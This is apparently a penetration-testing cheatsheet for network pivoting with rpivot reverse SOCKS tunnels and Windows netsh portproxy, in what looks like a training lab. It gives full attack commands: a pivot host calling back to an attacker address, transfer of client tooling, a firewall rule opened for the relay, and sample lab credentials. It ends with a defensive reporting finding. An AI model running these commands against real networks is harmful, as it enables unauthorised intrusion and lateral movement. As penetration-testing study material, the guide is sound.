π‘οΈ Methodology Checklist
- netsh portproxy (no binary needed):
netsh interface portproxy add v4tov4 localport=[PORT] connectaddress=[DEST] connectport=[PORT] - Verify:
netsh interface portproxy show all - rpivot: start server on attacker, upload and run
client.pyon Windows pivot - Configure Proxychains to use rpivot SOCKS port
- Attack internal targets through proxy
- Cleanup netsh:
netsh interface portproxy delete v4tov4 localport=[PORT]
π― Operational Context
Use when: HTTP-only egress or Windows pivot with no additional tools β rpivot for HTTP CONNECT proxy, netsh portproxy for TCP relay without binaries.
Think Dumber First: netsh portproxy = zero binary requirement: netsh interface portproxy add v4tov4 localport=[LPORT] connectaddress=[DEST] connectport=[DPORT]. This is a single Windows command that creates a TCP relay. No file transfer, no AV concerns.
Skip when: SSH or Chisel is available β more flexible than netsh portproxy.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 | Rpivot β start SOCKS server on attack host |
scp -r rpivot [USER]@[PIVOT_IP]:/home/ubuntu/ | Transfer rpivot to pivot host |
python2.7 client.py --server-ip [LHOST] --server-port 9999 | Rpivot β pivot connects back to attack host |
python client.py --server-ip [LHOST] --server-port 9999 --ntlm-proxy-ip [PROXY_IP] --ntlm-proxy-port 8080 --domain [DOMAIN] --username [USER] --password [PASS] | Rpivot β traverse corporate NTLM proxy |
proxychains firefox-esr 172.16.5.135:80 | Access internal web service via Rpivot SOCKS tunnel |
netsh.exe interface portproxy add v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] connectport=[TARGET_PORT] connectaddress=[INTERNAL_IP] | Windows netsh β create port forward rule (requires admin) |
netsh.exe interface portproxy show v4tov4 | Verify netsh port forward rules |
netsh advfirewall firewall add rule name="Pivot_Forward" dir=in action=allow protocol=TCP localport=[LPORT] | Open Windows firewall for the netsh listen port |
xfreerdp3 /v:[PIVOT_IP]:[LPORT] /u:[TARGET_USER] /p:[TARGET_PASS] +clipboard | Connect through netsh portproxy |
netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] | Remove netsh port forward (cleanup) |
sc query iphlpsvc | Check IP Helper service (required for netsh portproxy) |
π¬ Deep Dive & Workflow
Rpivot β Reverse SOCKS Proxy (Python 2.7)
Use when SSH is blocked/unavailable and the pivot can reach out but you canβt reach in. Reverse connection model: pivot initiates the connection back to your attack host.
Requires Python 2.7 β often missing on modern systems:
# Install on attack host if needed
sudo apt-get install python2.7
# Or use pyenv for a local install without aptFull workflow:
# Attack host β start SOCKS server
cd rpivot
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# proxy-port: what proxychains uses
# server-port: what pivot connects to
# Transfer to pivot
scp -r rpivot ubuntu@10.129.202.64:/home/ubuntu/
# Pivot host β call home
cd rpivot
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
# Success: "New connection from host ..." appears on attack host
# Configure proxychains
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
# Use
proxychains firefox-esr 172.16.5.135:80NTLM proxy traversal (corporate environments):
python client.py --server-ip 10.10.14.18 --server-port 9999 \
--ntlm-proxy-ip 172.16.5.1 --ntlm-proxy-port 8080 \
--domain INLANEFREIGHT --username forend --password Klmcargo2Server vs Client roles:
| Component | Runs On | Role |
|---|---|---|
server.py | Attack host | Listens for callback, opens SOCKS port |
client.py | Pivot host | Connects outbound to attacker |
Windows Netsh Portproxy β Native Windows Pivot
Use when you have a compromised Windows host and need to forward traffic to an internal target. No external binaries needed β built into Windows.
# On Windows pivot (admin CMD):
# Forward: Pivot:8080 β Internal:3389
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
# Verify
netsh.exe interface portproxy show v4tov4
# CRITICAL: Netsh rule does NOT open the firewall port automatically
netsh advfirewall firewall add rule name="Pivot_Forward" dir=in action=allow protocol=TCP localport=8080
# Connect from attack host using TARGET's credentials (not pivot's)
xfreerdp3 /v:10.129.15.150:8080 /u:victor /p:pass@123 +clipboard
# Cleanup
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.15.150Prerequisites:
- Admin rights on Windows pivot
IP Helperservice running:sc query iphlpsvc- Specify
listenaddressexplicitly to prevent IPv6 binding ambiguity
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| netsh portproxy requires elevation | UAC prompt | Run from elevated prompt; net session to verify admin; or use Chisel as alternative |
| rpivot not working | Python2 dependency | rpivot requires Python2: python2 client.py --server-ip [ATTACKER] --server-port 9999; not Python3 compatible |
| netsh portproxy relay drops connections | Firewall rule needed | Add: netsh advfirewall firewall add rule name=pivot dir=in action=allow protocol=TCP localport=[LPORT] |
| rpivot HTTP proxy not routing all traffic | CONNECT method required | Configure proxychains to use CONNECT proxy; rpivot creates HTTP CONNECT proxy on port 1080 |
| netsh portproxy breaks after reboot | Not persistent | Add registry entry to persist; or re-run command after reboot |
π Reporting Trigger
Finding Title: TCP Port Forwarding via netsh Enables Internal Resource Access Impact: Windows netsh portproxy creates a TCP relay without requiring any external binary or tool transfer, enabling access to internal services from an external attacker position using only built-in Windows functionality. Root Cause: netsh is a trusted Windows administrative tool that creates listening TCP ports without triggering application allowlisting. No monitoring of netsh portproxy rule creation. Recommendation: Monitor netsh command execution for portproxy rule creation. Alert on unexpected listening ports on Windows servers. Implement host-based firewall logging for new inbound port access.